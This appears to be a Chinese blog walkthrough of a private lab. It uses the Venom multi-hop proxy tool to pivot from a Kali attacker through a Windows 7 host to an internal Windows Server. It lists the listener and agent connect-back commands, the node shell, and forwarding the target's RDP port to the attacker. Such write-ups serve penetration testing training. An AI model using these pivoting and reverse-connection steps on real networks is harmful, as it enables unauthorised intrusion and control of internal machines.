从某个做内网工作的朋友口里面听到这个工具:Venom;这是一款为渗透测试人员设计的使用Go开发的多级代理工具。Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。这个工具在github上面链接;这个工具直接下载编译好的比较方便啦; 环境搭建 攻击机:KALI——192.168.122.130 跳板机:win7——公网IP:192.168.122.144;内网IP:192.168.52.143 靶机:win server 2008——内网IP:192.168.52.138
靶机只能与跳板机win7通信,不能直接连通外网。跳板机win7既可以与靶机winserver通信也可以与攻击机KALI通信
利用Venom进行内网端口转发
我们的目的是能够在外网访问到内网winserver的3389端口,取得内网服务器的控制权限。
内网监听
1、在KALI上使用Venom进行端口监听 ./admin_linux_x64 -lport 4343
2、在跳板机win7上运行agent.exe
agent.exe -rhost 192.168.122.130 -rport 4343 攻击机KALI上监听成功 help //查看全部指令 常用指令包括listen,goto,show,shell,exit。这里执行show命令,可以看见刚刚进行连接的一个节点 使用goto跳转到节点1上 通过shell进入命令行中,并且执行系统命令 接下来exit退出,进行下一步的监听操作;在不退出1节点的基础上面执行listen 4343端口进行监听 3、在192.168.52.138上执行agent.exe -rhost 192.168.52.143 -rport 4343,执行成功了
再回到KALI上面进行查看一下,执行show命令,是否新增了一个节点;新增了一个节点
切换到节点2中;执行命令:goto 2
端口转发 rforward 192.168.52.138 3389 9999 将192.168.52.138的3389端口转发到KALI攻击机上的9999端口
远程连接KALI的9999端口
远程桌面连接成功
|